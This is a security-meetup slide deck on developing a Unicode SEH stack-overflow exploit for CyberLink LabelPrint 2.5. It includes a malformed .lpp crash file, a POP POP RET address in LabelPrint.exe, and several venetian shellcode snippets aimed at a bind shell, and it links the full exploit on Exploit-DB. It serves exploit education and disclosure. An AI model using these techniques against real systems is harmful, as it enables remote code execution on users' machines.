The document discusses a cybersecurity exploit found in Cyberlink LabelPrint 2.5, which is commonly bundled with various laptop brands. The exploit involves a stack overflow vulnerability that allows an attacker to overwrite the Structured Exception Handler (SEH) using Unicode-based payloads. It outlines the technical processes and code snippets necessary for exploiting the vulnerability for educational purposes in a cybersecurity context.

1. Exploit
Development
Cyberlink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Cloud
Indonesian Cloud, Jakarta, 13 October 2017

2. Who?
 Thomas Gregory - @modpr0be
 IT Security consultant @Spentera
 Security researcher (occasionally)
 focus on Windows exploitation
 IT Security trainer (sometimes)
 f3ci - ????
 Security researcher
 Penetration tester, red team
 Appsec & simple exploit dev

3. What?
 CyberLink LabelPrint 2.5
 Labeling software
 Embedded by default in CyberLink Power2Go
installation.
 Included as bloatware in all Lenovo, HP, Asus
laptops somewhere between 2015-2016.

4. Why?
 The exploit development is quite challenging and
interesting
 We want to share it for education purposes only.

5. Let’s Begin
THE FUZZ

6. Fuzzing possibility
 File Input
 import
 open media
 open project
 Registry overflow

7. Tools
 Immunity Debugger
 with mona plugin
 Editor/IDE
 /me using sublime text

8. LabelPrint Project
 Project file with extension .lpp
 Header
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017"
SystemTime="24/07/2017">
<TRACK name=“” />

9. The Bug
 In the name parameter, inside the TRACK tag
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK
name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA” />
</INFORMATION>
</PROJECT>

10. SEH Overwritten
 Overwritten SE Handler

11. Unicode Based
 AA or 4141 will be .A.A or 00410041

12. What is SEH?
 a piece of code that is written inside an
application, with the purpose of dealing with the
fact that the application throws an exception
(taken from corelan)
 an exception is an event, which occurs during the
execution of a program, that disrupts the normal
flow of the program's instructions.
 a catcher, who is trying to catch unusual
behavior.

13. What is SEH?
This structure ( also called a SEH record) is 8 bytes
and has 2 (4 bytes) elements :
 a pointer to the next exception registration
structure (in essence, to the next SEH record, in
case the current handler is unable the handle the
exception)
 a pointer, the address of the actual code of the
exception handler. (SE Handler)

14. Abusing SEH
In other words, the payload must do the following
things:
 Cause an exception. Without an exception, the SEH
handler (the one you have overwritten/control)
won’t kick in.
 Overwrite the pointer to the next SEH record with
some jumpcode (so it can jump to the shellcode)
 Overwrite the SE handler with a pointer to an
instruction that will bring you back to next SEH and
execute the jumpcode.
 The shellcode should be directly after the
overwritten SE Handler. Some small jumpcode
contained in the overwritten “pointer to next SEH
record” will jump to it).

15. Abusing SEH
 When the exception occurred, the position on the
stack will going like this:
 Possible value to overwrite SE Handler are POP
something, POP something and RETN to the stack.
 It will POP address that sit at the top of the stack,
POP it again to take the second address, and RETN
to execute the third address (which is now at the
top of the stack)
 The third address usually our supplied input buffer
Top of stack
Our pointer to next SEH
address

16. Abusing SEH
Image was taken from http://corelan.be
with permission from Peter van Eeckhoutte (Corelan)

17. Unicode?
 Unicode allows us to visually represent and/or
manipulate text in most of the systems across the
world in a consistent manner.
 Unicode based exploit usually involved in
 file/folder naming
 part of input parameter that will deal with naming

18. More Info
 Structured Exception Handler (SEH)
 https://msdn.microsoft.com/en-
us/library/windows/desktop/ms680657(v=vs.85).aspx
 https://www.corelan.be/index.php/2009/07/25/writi
ng-buffer-overflow-exploits-a-quick-and-basic-
tutorial-part-3-seh/
 https://blog.spentera.com/2011/09/14/seh-based-
stack-overflow-the-basic/
 Unicode based exploit
 https://www.corelan.be/index.php/2009/11/06/expl
oit-writing-tutorial-part-7-unicode-from-0x00410041-
to-calc/

19. SEH + Unicode = Venetian
PROBABLY THE MOST HATED COMBINATION

20. Venetian Shellcode
 One of the registers must point at the beginning of
the shellcode.
 One register must point at a memory location that is
writeable (and where it’s ok to write the new
reassembled shellcode)
 Normal venetian prepend shellcode
 Push another register to stack (ESP)
 Pop stack (ESP) into EAX
 Align the EAX register with add/sub instruction
 Push EAX register into stack (ESP)
 RET (return to the beginning of shellcode at EAX)
 Sadly, we won’t face a normal venetian approach

21. Typical Venetian Unicode
Prepend Opcode
Align EAX
Register
•If we use EAX as
BufferRegister, we
need to align EAX to
point to our Buffer
“Stack
Walking”
•Walk over the Next
SEH and SEH.
RET to
Shellcode
• Shellcode
executed

22. Typical Venetian Unicode
Prepend Opcode
ven = "x56" #push esi
ven += "x41" #align
ven += "x58" #pop eax
ven += "x41" #align
ven += "x05x04x01" #add eax,01000400
ven += "x41" #align
ven += "x2dx01x01" #add eax,01000100
ven += "x41" #align
ven += "x50" #push eax
ven += "x41" #align
ven += "xc3" #ret
Depends on where
our buffer is.
Use EAX as a
BufferRegister

23. Problem?
 Limited instruction (because of Unicode)
 need to find POP POP RET with Unicode friendly
 All hex value between 0x80 – 0xFF are marked as
bad
 Yes, RET opcode (C3) is also included in the bad
character list.
 Meanwhile, our venetian shellcode need RET
 Typical Venetian

24. Sh*t!

25. Solution
 Find a proper Unicode friendly PPR (pop pop ret)
instructions address somewhere in the library or
executable
 Create “our version” of RET
 Fill the stack (ESP) with our shellcode
 Pointing our RET to CALL ESP instruction address
 This will alter the flow of execution.
 EAX must be pointing to the beginning of our
shellcode.
 “Stack walk” until we meet shellcode.

26. Our Venetian Unicode
Shellcode
Align EAX
Register
Calculate
where RET will
be placed
Construct RET
in EAX
Calculate EAX
for CALL ESP
Opcode
Reaching RET,
Execute CALL
ESP
Re-aligning
EAX
“Stack walk”
to Shellcode
Bind shell 4444

27. pop pop ret
 !mona seh
 Fortunately, we found one address that is an
Unicode friendly (0x0044002c) in the main
program (LabelPrint.exe)

28. Construct RET (1)
 Calculate the value of EAX register, preparing the
address where we exactly want the decoded RET
being placed later in the stack.
 Limited calculation (because of UNICODE)
 Zeroing the EAX register first
 xor eax,eax

29. Construct RET (2)
Preparing address to push our RET:
 push esp
 pop eax
 and EAX register with 01001B00
 and EAX register with 01000100
 push EAX
 pop ESP
ven += "x42" #nop
ven += "x54" #push esp
ven += "x42" #nop
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x05x1Bx01" #add eax 01001B00
ven += "x42" #nop
ven += "x2dx01x01" #sub eax 01001000
ven += "x42" #nop
ven += "x50" #push eax
ven += "x42" #nop
ven += "x5c" #pop esp

30. Construct RET (3)
 After the calculation in EAX, now the stack (ESP) will be
pointing at 0x0012F655 (the same value as EAX)
 This is important for our RET decoding address later.

31. Construct RET (4)

32. Zeroing Out EAX
 We need to clear the EAX register for the next
calculation of the RET opcode.
 After EAX is zeroed out we can calculate the EAX
register to meet 0xC300C300 (RET opcode).
 We can perform the calculation with AND
operand :
 AND EAX register with 7e007e00
 AND EAX register with 01000100

33. Zeroing Out EAX
ven += "x42" #nop
ven += "x25x7ex7e" #and eax,7e007e00
ven += "x42" #nop
ven += "x25x01x01" #and eax,01000100

34. Construct RET (5)
Preparing RET opcode:
 Zeroing Out EAX first (done)
 XOR EAX register with 7f007f00
 ADD EAX register with 44004400
 PUSH EDI
 PUSH EAX

35. The RET Opcode (1)
ven += "x35x7fx7f" #xor eax,7f007f00
ven += "x42" #nop
ven += "x05x44x44" #add eax,44004400
ven += "x42" #nop
ven += "x57" #push edi/padding
ven += "x42" #nop
ven += "x50" #push eax

36. The RET Opcode (2)

37. Construct CALL to ESP (1)

38. Construct CALL to ESP (2)

39. Construct CALL to ESP (3)

40. Stack Walk to Shellcode

41. Our Venetian Shellcode
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x05x10x01" #add eax, 11001900, align eax to our buffer
ven += "x42" #nop
ven += "x2dx0ex01" #add eax, 11001800, align eax to our buffer
ven += "x42" #nop
ven += "x50" #push eax
ven += "x42" #nop
ven += "x5C" #pop esp
ven += "x42" #nop
ven += "x58" #pop eax
ven += "x42" #nop
ven += "x05x53x7c" #add eax 7c005300 part of call esp
ven += "x42" #nop
ven += "x50" #push eax
ven += "x42" * 68 #padding to fill the stack
ven += "x7bx32" #part of call esp

42. Final Exploit
https://www.exploit-db.com/exploits/42777/

43. Solution
 For now, do not user CyberLink Label Print.

44. Thank you
research@spentera.id